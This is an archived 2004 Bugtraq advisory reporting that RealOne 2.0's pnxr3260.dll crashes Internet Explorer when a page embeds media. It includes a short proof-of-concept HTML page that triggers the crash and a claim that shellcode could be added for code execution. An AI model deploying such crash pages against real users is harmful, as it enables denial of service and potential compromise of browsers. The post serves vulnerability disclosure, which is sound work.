lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 22 Dec 2004 18:30:58 -0000
From: Wei Li <pcocop@...mail.com>
To: bugtraq@...urityfocus.com
Subject: Realone2.0 "pnxr3260.dll" Lets Remote Users IE  Browser Crash




Impact:  Denial of service via network 
Version(s):Realone 2.0(build 6.0.11.868)

I. BACKGROUND
   &lt;EMBED ...> puts a browser plugin in the page. A plugin is a special program located on the client computer (i.e. not on your web server) that handles its own special type of data file. The most common plugins are for sounds and movies. The &lt;EMBED ...> tag gives the location of a data file that the plugin should handle. 

II. DESCRIPTION
    A vulnerability was found in the IE browser with system installed Realone 2.0(build 6.0.11.868) in the processing of the 'embed' tag. A remote user can create HTML that include &lt;EMBED ...> , when loaded by the client user, will cause the client user's browser to call the plugin of Realone,and then the IE browser crash. 

The err signature of Iexplorer.exe:
AppName: iexplore.exe	 AppVer: 6.0.2800.1106	   ModName:pnxr3260.dll
ModVer: 6.0.7.4552	 Offset: 00003e98


III. ANALYSIS

An attacker can exploit the above-described vulnerability to execute 
arbitrary code under the permissions of the target user. Successful 
exploitation requires that the attacker convince the end user to install realone2.0(build 6.0.11.868. 

Premise:the client user had installed realone2.0(Edition 6.0.11.868).
The following demonstration exploit can cause IE to crash:

<html>
<head>
&lt;script language=javascript>
function dSend() {
document.crash.text;
}
&lt;/script&gt;

</head>
<body onLoad="dSend()">
</head>
<P>&lt;EMBED src=http://w.net/mp3/wind.mp3 ></P>
</body>
</html> 

The attacker can insert shellcode script in above html to execute 
arbitrary code.

IV. Solution
Updated to the newest edition of reaone.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ